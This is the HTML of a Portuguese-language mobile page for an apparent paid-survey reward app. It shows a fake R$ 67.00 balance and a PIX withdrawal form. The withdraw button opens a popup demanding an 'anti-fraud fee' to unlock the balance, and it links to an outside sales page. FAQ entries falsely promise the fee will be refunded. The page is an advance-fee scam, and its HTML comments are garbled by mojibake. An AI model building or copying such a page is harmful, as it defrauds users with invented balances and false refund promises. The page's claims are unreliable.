        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">paid</span>
      </a>
       
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Pagina 2" -->
      <a href="#" onclick="mostrarPagina('inicio')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: #06B32E;">home</span>
      </a>
      
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Saque" -->
      <a href="#" onclick="mostrarPagina('bonus')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">help</span>
      </a>
    </div>
  </div>


  
  <!--------------------- ConteÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Âºdo do "Saque" --------------------->

  
  <div id="saque" style="display: none;">

    <div class="menu">
      <a style="width: 30%; ">
        <img src="images/opinilogo.png" style="width:  110px;">
      </a> 
      <a></a>
    </div>


    <div style="margin-bottom: 100px;"></div>
      
    
    <div class="outer-box">
      <div class="valor-box-saque">
          <p style="font-size: 16px; margin-bottom: 15px; text-align: center; color: rgb(101, 101, 101);">Seu saldo</p>
          <span id="valor-money" style="font-size: 45px; text-align: center; font-family: 'Montserrat', sans-serif; letter-spacing: -2px; color: #06B32E;">R$ 67.00</span>
      </div>
    </div>

    <p style="margin-bottom: 18px; margin-top: 23px; color: rgb(101, 101, 101); text-align: center; font-weight: bold;">Selecione seu tipo de chave PIX</p>

    
    <div class="button-container">
      
      <button class="square-button" onclick="toggleButton(1)">
        <img decoding="async" src="images/cpf.png" alt="Botao 1">
      </button>
      
      <button class="square-button" onclick="toggleButton(2)">
        <img decoding="async" src="images/telefone.png" alt="Botao 2">
      </button>
      
      <button class="square-button" onclick="toggleButton(3)">
        <img decoding="async" src="images/email.png" alt="Botao 3">
      </button>
      
      <button class="square-button" onclick="toggleButton(4)">
        <img decoding="async" src="images/qr.png" alt="Botao 4">
      </button>

    </div>

    <div style="margin-bottom: 15px;"></div>
    
    

    
    <!--------------------- MENU EMBAIXO --------------------->

    
    <div class="menuemb">
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "InÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â­cio" -->
      <a href="#" onclick="mostrarPagina('saque')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: #06B32E;">paid</span>
      </a>
       
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Pagina 2" -->
      <a href="#" onclick="mostrarPagina('inicio')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">home</span>
      </a>
      
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Saque" -->
      <a href="#" onclick="mostrarPagina('bonus')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">help</span>
      </a>
    </div>

    


    <input class="form-input" type="text" name="chave-pix" id="chave-pix" placeholder="Digite sua chave PIX aqui">

    <input class="form-input" style="margin-top: 15px;" type="text" name="quantia" id="quantia" placeholder="Digite o valor que deseja sacar" inputmode="numeric" oninput="formatarValor(this)">
    
    <button class="desbloquear-button" onclick="showPopup()" style="font-weight: bold; font-size: 18x; border-radius: 12px; margin-top: 15px;">REALIZAR SAQUE</button>
  
  <!--------------------- TAXA DESBLOQUEIO --------------------->
    
    <div class="popup-container" id="popup">
        
      <script src="js/lottie-player.js"></script><lottie-player src="https://lottie.host/7c73a00c-afa8-4ad5-b6b7-d8050e57f0c3/pg6N0GhPE7.json" background="##ffffff" speed="1.25" style="width: 150px; height: 150px; margin: 0 auto; display: flex;" loop="" autoplay="" direction="1" mode="normal"></lottie-player>

      <!--<span class="popup-text" style="font-size: 20px; font-weight: bold;">APRENDA A DESBLOQUEAR<br>SEU SALDO EM 1 MINUTO</span>--->
      <span class="popup-text" style="font-size: 20px; font-weight: bold;">DESBLOQUEAR SEU SALDO</span>

      <div style="margin-bottom: 20px;"></div>
      <p class="popup-text" style="padding-left: 5%; padding-right: 5%; text-align: justify;">Usamos uma taxa anti-fraudes, para evitar fraudes e abuso dos saques que estavam ocorrendo dentro do sistema.<br><br>Fique tranquilo, voce recebera o valor da taxa de volta junto ao valor do seu saque, e apenas uma etapa de validamento de que voce seria um humano e nao um robo.</p>
      <div style="margin-bottom: 20px;"></div>

        
        <button class="desbloquear-button" style="font-weight: bold;" onclick="window.open('https://spotfyapp.com/vsl/' + window.location.search)">DESBLOQUEAR AGORA</button>

      <!--<button class="desbloquear-button" style="font-weight: bold;" onclick="video();">VEJA COMO</button>--->
    </div>

    <div style="margin-bottom: 20px;"></div>

    <!--------------------- VIDEO DESBLOQUEIO --------------------->

    <!--<div class="popup-container" id="popupvideo">
      
      <div style="width: 70%; height: 70%; display: flex; margin: 0 auto; border-radius: 12px; margin-bottom: 10px;">

        <div id="vid_6590e057fa276e0009498386" style="position:relative;width:100%;padding: 178.21782178217822% 0 0; margin-bottom: 10px; border-radius: 12px; display: flex; margin: 0 auto;"><img id="thumb_6590e057fa276e0009498386" src="https://images.converteai.net/0b265e52-7b06-411f-b1b3-e2e5a9c23f78/players/6590e057fa276e0009498386/thumbnail.jpg" style="position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;display:block;"><div id="backdrop_6590e057fa276e0009498386" style="position:absolute;top:0;width:100%;height:100%;-webkit-backdrop-filter:blur(5px);backdrop-filter:blur(5px);"></div></div><script type="text/javascript" id="scr_6590e057fa276e0009498386">var s=document.createElement("script");s.src="https://scripts.converteai.net/0b265e52-7b06-411f-b1b3-e2e5a9c23f78/players/6590e057fa276e0009498386/player.js",s.async=!0,document.head.appendChild(s);</script>

      </div>

<button class="desbloquear-button" style="font-weight: bold;" onclick="window.open('https://notacantoress.shop/vsl/' + window.location.search)">DESBLOQUEAR AGORA</button>


    </div>

    <div style="margin-bottom: 20px;"></div>--->

    
  </div>
  

 
    <!--------------------- Pagina bonus --------------------->
	
	

  <div id="bonus" style="display: none;">
      
      
      <!--------------------- Menu de cima --------------------->
      
        <div class="menu">
          <a style="width: 30%; ">
            <img src="images/opinilogo.png" style="width:  110px;">
          </a> 
          <a></a>
        </div>
        <div style="margin-bottom: 90px;"></div>
    
        <div style="margin-bottom: 110px;"></div>
     
        <p class="faq-title">Perguntas frequentes</p>

        <div class="faq-container">
          <div class="faq-item">
            <div class="question" onclick="toggleAnswer(this)">Preciso pagar a taxa toda vez?</div>
            <div class="answer">Nao! A taxa eseria paga somente a primeira vez, para confirmar que voce seria um humano, e nao um robo. Voce recebera o estorno do valor da taxa, apos o primeiro saque!</div>
          </div>
          <div class="faq-item">
            <div class="question" onclick="toggleAnswer(this)">Por que existe a taxa?</div>
            <div class="answer"> Serve como uma etapa anti-fraude, para evitar fraudes e abuso dos saques que estavam ocorrendo dentro da plataforma! Mas nao precisa se preocupar, voce recebera o valor da taxa de volta, junto ao valor do seu saque, seria apenas uma etapa de validamento de que voce e humano e nao um robo.</div>
          </div>
          <div class="faq-item">
            <div class="question" onclick="toggleAnswer(this)">Em quanto tempo vou receber?</div>
            <div class="answer">Voce recebera seu saque dentro de 24 horas, da mesma forma que voce receber seu saque teste!</div>
          </div>
          <div class="faq-item">
            <div class="question" onclick="toggleAnswer(this)">Quantas vezes posso sacar por dia?</div>
            <div class="answer">Quantas voce quiser, mas existe uma quantidade limitada de codigos que temos acesso por dia!</div>
          </div>
          <div class="faq-item">
            <div class="question" onclick="toggleAnswer(this)">Como usa o aplicativo?</div>
            <div class="answer">e muito simples de usar! Basta responder as simples perguntas sobre as empresas, no menu principal, e por fim, clicar no botao de "Enviar respostas", quando enviar, ja recebera seu dinheiro pela tarefa realizada!</div>
          </div>
      </div>

      <div style="margin-bottom: 150px;"></div>



  
    
    
    <!--------------------- Menu debaixo --------------------->

    
    


    
    <div class="menuemb">
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "InÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â­cio" -->
      <a href="#" onclick="mostrarPagina('saque')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">paid</span>
      </a>
       
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Pagina 2" -->
      <a href="#" onclick="mostrarPagina('inicio')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: rgb(101, 101, 101);">home</span>
      </a>
      
      <!-- Chamando a funÃƒÆ’Ã†â€™Ãƒâ€ Ã¢â‚¬â„¢ÃƒÆ’Ã¢â‚¬Â ÃƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â§ao para mostrar "Saque" -->
      <a href="#" onclick="mostrarPagina('bonus')">
        <span class="material-symbols-outlined" style="text-align: center; width: 120%; margin: 15px; font-size: 40px; color: #06B32E;">help</span>
      </a>
    </div>
    
    
  </div>
  
  
  
  <script src="js/scripts.js"></script>
  
  <!--
  <script>
    (function() {
    
    function getURLParameters() {
        const queryString = window.location.search;
        return queryString ? queryString.substring(1) : '';
    }

    
    function updateLinks() {
        const params = getURLParameters();
        if (!params) return; // Se não houver parâmetros, não faz nada

        const links = document.querySelectorAll('a[href]');
        links.forEach(link => {
            const url = new URL(link.href, window.location.origin);

            // Verifica se os parâmetros já estão no link
            if (!url.search.includes(params)) {
                url.search += (url.search ? '&' : '') + params;
                link.href = url.toString();
            }
        });
    }

    
    setInterval(updateLinks, 300);
})();
</script>
-->





</body></html>